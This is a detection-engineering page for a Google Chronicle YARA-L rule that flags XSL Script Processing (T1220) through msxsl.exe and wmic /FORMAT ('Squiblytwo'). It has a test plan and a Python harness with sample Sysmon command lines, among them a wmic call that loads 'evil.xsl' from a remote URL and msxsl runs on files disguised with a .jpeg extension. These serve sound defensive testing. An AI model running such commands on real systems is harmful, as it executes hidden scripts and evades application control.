T1220 Google Chronicle · YARA-L

Detect XSL Script Processing in Google Chronicle

Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files support embedded scripting in JavaScript, VBScript, and other languages. Two primary abuse vectors exist: (1) msxsl.exe, Microsoft's command-line XSLT transformation utility, which can execute arbitrary JavaScript or VBScript embedded in local or remote XSL files; and (2) wmic.exe with the /FORMAT switch ('Squiblytwo'), which invokes JScript or VBScript within XSL via WMI. Both techniques leverage trusted Windows tooling to proxy malicious code execution while evading application control solutions such as AppLocker. Since msxsl.exe is not installed by default, adversaries typically drop it alongside their payloads. Real-world usage includes Astaroth, Cobalt Group, and Higaisa.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1220 XSL Script Processing
Canonical reference
https://attack.mitre.org/techniques/T1220/

YARA-L Detection Query

Google Chronicle (YARA-L)
rule t1220_xsl_script_processing {
  meta:
    author = "Argus Detection Engineering"
    description = "Detects T1220 XSL Script Processing via msxsl.exe execution or wmic.exe /FORMAT abuse (Squiblytwo). Both vectors proxy arbitrary script execution through trusted Windows tooling."
    mitre_attack_tactic = "Defense Evasion"
    mitre_attack_technique = "T1220"
    severity = "HIGH"
    confidence = "HIGH"
    created = "2026-04-13"
    platform = "Windows"

  events:
    $e.metadata.event_type = "PROCESS_LAUNCH"
    $e.principal.hostname = $hostname
    $e.target.process.command_line = $cmdline

    (
      // msxsl.exe execution — any invocation
      re.regex($e.target.process.file.full_path, `(?i)msxsl\.exe$`)

      or

      // wmic.exe with /FORMAT targeting XSL/remote URLs (Squiblytwo)
      (
        re.regex($e.target.process.file.full_path, `(?i)wmic\.exe$`)
        and
        re.regex($e.target.process.command_line, `(?i)/format`)
        and
        (
          re.regex($e.target.process.command_line, `(?i)\.xslt?`) or
          re.regex($e.target.process.command_line, `(?i)https?://`) or
          re.regex($e.target.process.command_line, `(?i)ftp://`)
        )
      )
    )

  match:
    $hostname over 5m

  outcome:
    // Because the rule has a match section, each outcome value is an aggregate
    // over the events grouped per hostname in the 5m window.
    // Backtick strings are raw in YARA-L, so `\\\\` matches a UNC prefix (two literal backslashes).
    $risk_remote = max(if(
      re.regex($cmdline, `(?i)(https?://|ftp://|\\\\)`), 1, 0
    ))
    // Extension can be followed by whitespace, a closing quote, or end of the command line
    $risk_arbitrary_ext = max(if(
      re.regex($cmdline, `(?i)\.(jpeg|jpg|png|gif|txt|dat|bin|log)(\s|"|$)`), 1, 0
    ))
    $is_squiblytwo = max(if(
      re.regex($e.target.process.file.full_path, `(?i)wmic\.exe$`) and
      re.regex($cmdline, `(?i)/format`), 1, 0
    ))
    // Variant is derived from the event fields directly rather than from another
    // outcome variable; all non-msxsl matches are wmic /FORMAT by construction of the events section.
    $technique_variant = array_distinct(if(
      re.regex($e.target.process.file.full_path, `(?i)msxsl\.exe$`) and
      re.regex($cmdline, `(?i)(https?://|ftp://|\\\\)`),
      "msxsl-remote-xsl",
      if(
        re.regex($e.target.process.file.full_path, `(?i)msxsl\.exe$`) and
        re.regex($cmdline, `(?i)\.(jpeg|jpg|png|gif|txt|dat|bin|log)(\s|"|$)`),
        "msxsl-arbitrary-ext",
        if(
          re.regex($e.target.process.file.full_path, `(?i)msxsl\.exe$`),
          "msxsl-local-xsl",
          if(
            re.regex($e.target.process.file.full_path, `(?i)wmic\.exe$`) and
            re.regex($cmdline, `(?i)(https?://|ftp://)`),
            "squiblytwo-remote",
            "squiblytwo-local"
          )
        )
      )
    ))

  condition:
    $e
}

Chronicle YARA-L 2.0 rule detecting T1220 XSL Script Processing. Matches PROCESS_LAUNCH events for msxsl.exe (any invocation, with enrichment for remote loads and arbitrary extensions) and wmic.exe with /FORMAT targeting XSL/XSLT files or remote URLs. Outcome variables classify technique variant and risk indicators.

Data Sources

  • Google Chronicle UDM
  • Windows endpoint telemetry via Chronicle forwarder
  • Sysmon via Chronicle ingestion

Required Tables

PROCESS_LAUNCH UDM events

False Positives & Tuning

  • Enterprise XML processing pipelines that legitimately invoke msxsl.exe for XSLT transformations on internal file servers accessed via UNC paths
  • System administrators running wmic.exe /FORMAT with organization-approved XSL stylesheets for WMI data formatting
  • Software deployment frameworks that drop and execute msxsl.exe as part of an XML-driven installation workflow

Testing Methodology

Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: msxsl.exe Local XSL Script Execution

    Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine containing test.xml and test.xsl. Sysmon Event ID 7: Image Load for jscript.dll loaded by msxsl.exe, confirming JScript engine activation. Sysmon Event ID 1: Child process whoami.exe spawned by msxsl.exe (or WScript.Shell). Sysmon Event ID 11: File creation events for test.xml and test.xsl.

  2. Test 2: msxsl.exe Same-File Argument Evasion

    Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine showing the same filename appearing twice (e.g., 'selfref.xsl selfref.xsl'). Sysmon Event ID 7: Image Load for jscript.dll by msxsl.exe. Sysmon Event ID 11: File creation for selfref.xsl.

  3. Test 3: Squiblytwo — wmic /FORMAT Remote XSL Execution

    Expected signal: Sysmon Event ID 1: Process Create with Image=wmic.exe, CommandLine containing '/FORMAT' and 'http://127.0.0.1:19823/evil.xsl'. Sysmon Event ID 3: Network Connection attempt from wmic.exe to 127.0.0.1:19823 (connection refused, but event is logged). Sysmon Event ID 22: DNS query if a hostname is used instead of IP.

  4. Test 4: Squiblytwo — wmic /FORMAT Local XSL File

    Expected signal: Sysmon Event ID 1: Process Create with Image=wmic.exe, CommandLine containing '/FORMAT' and the %TEMP% path to wmic_test.xsl. Sysmon Event ID 7: jscript.dll loaded by wmic.exe. Sysmon Event ID 11: File creation for wmic_test.xsl.

  5. Test 5: msxsl.exe Arbitrary Extension Masking

    Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine containing '.jpeg' file extensions instead of .xsl. Sysmon Event ID 7: jscript.dll loaded by msxsl.exe. Sysmon Event ID 11: File creation events for data.jpeg and style.jpeg.
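The following is an added example, not part of the Argus rule or of Google Chronicle, that re-implements the rule's events and outcome logic in Python so the five expected Sysmon Event ID 1 signals above, and the allowlist suggested under False Positives & Tuning, can be checked offline before the YARA-L rule is deployed. The Sysmon-style records, hostnames, paths and the APPROVED_STYLESHEETS list are all constructed for this example; only Image and CommandLine are modelled, since those are the two fields the rule inspects.

```python
import re
from collections import defaultdict

# Regexes mirror the YARA-L rule (case-insensitive, path anchored at end).
MSXSL = re.compile(r"msxsl\.exe$", re.I)
WMIC = re.compile(r"wmic\.exe$", re.I)
FORMAT = re.compile(r"/format", re.I)
XSL = re.compile(r"\.xslt?", re.I)
URL = re.compile(r"(https?://|ftp://)", re.I)
# Python raw string: \\\\ is the regex \\\\, i.e. two literal backslashes (a UNC prefix).
REMOTE = re.compile(r"(https?://|ftp://|\\\\)", re.I)
ARB_EXT = re.compile(r"\.(jpeg|jpg|png|gif|txt|dat|bin|log)(\s|\"|$)", re.I)

# Constructed Sysmon Event ID 1 records (Image -> target.process.file.full_path,
# CommandLine -> target.process.command_line). Not telemetry from any real host.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Users\alice\AppData\Local\Temp\msxsl.exe",
     "cmdline": r"msxsl.exe test.xml test.xsl"},                          # Test 1
    {"host": "WS01", "image": r"C:\Tools\msxsl.exe",
     "cmdline": r"msxsl.exe http://example.invalid/r.xsl http://example.invalid/r.xsl"},
    {"host": "WS02", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic os get /FORMAT:"http://127.0.0.1:19823/evil.xsl"'},  # Test 3
    {"host": "WS02", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic process list /FORMAT:%TEMP%\wmic_test.xsl"},      # Test 4
    {"host": "WS03", "image": r"C:\Tools\msxsl.exe",
     "cmdline": r"msxsl.exe data.jpeg style.jpeg"},                       # Test 5
    {"host": "WS04", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic os get caption /FORMAT:list"},                     # no XSL/URL: no match
    {"host": "WS05", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe test.xsl"},                                 # wrong binary: no match
    {"host": "WS06", "image": r"C:\Tools\msxsl.exe",
     "cmdline": r"msxsl.exe \\fileserver\xml\report.xml \\fileserver\xsl\approved.xsl"},
]

# Hypothetical organization-approved stylesheet (tuning bullet 1: UNC-hosted XSL).
APPROVED_STYLESHEETS = (r"\\fileserver\xsl\approved.xsl",)


def classify(event, approved_stylesheets=()):
    """Return the rule's outcome variables for one event, or None if it does not match."""
    image, cmd = event["image"], event["cmdline"]
    is_msxsl = bool(MSXSL.search(image))
    is_squiblytwo = bool(WMIC.search(image) and FORMAT.search(cmd)
                         and (XSL.search(cmd) or URL.search(cmd)))
    if not (is_msxsl or is_squiblytwo):
        return None
    # Tuning exclusion: approved stylesheets referenced on the command line are suppressed.
    lowered = cmd.lower()
    if any(path.lower() in lowered for path in approved_stylesheets):
        return None
    risk_remote = int(bool(REMOTE.search(cmd)))
    risk_arbitrary_ext = int(bool(ARB_EXT.search(cmd)))
    if is_msxsl and risk_remote:
        variant = "msxsl-remote-xsl"
    elif is_msxsl and risk_arbitrary_ext:
        variant = "msxsl-arbitrary-ext"
    elif is_msxsl:
        variant = "msxsl-local-xsl"
    elif URL.search(cmd):
        variant = "squiblytwo-remote"
    else:
        variant = "squiblytwo-local"
    return {"host": event["host"], "variant": variant,
            "risk_remote": risk_remote, "risk_arbitrary_ext": risk_arbitrary_ext}


def run(events, approved_stylesheets=()):
    """Apply classify() to every event and keep the matches (the rule's condition: $e)."""
    return [d for d in (classify(e, approved_stylesheets) for e in events) if d]


def by_host(detections):
    """Emulate `match: $hostname over 5m` by grouping variants per host (window omitted)."""
    grouped = defaultdict(list)
    for d in detections:
        grouped[d["host"]].append(d["variant"])
    return dict(grouped)


if __name__ == "__main__":
    for host, variants in by_host(run(SAMPLE_EVENTS, APPROVED_STYLESHEETS)).items():
        print(host, sorted(set(variants)))
```

Running the block shows WS06 disappearing once the approved stylesheet is allowlisted, while the remaining hosts keep the same variant labels the Chronicle outcome section would emit; the time window of the match section is not modelled, so grouping is per host only.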
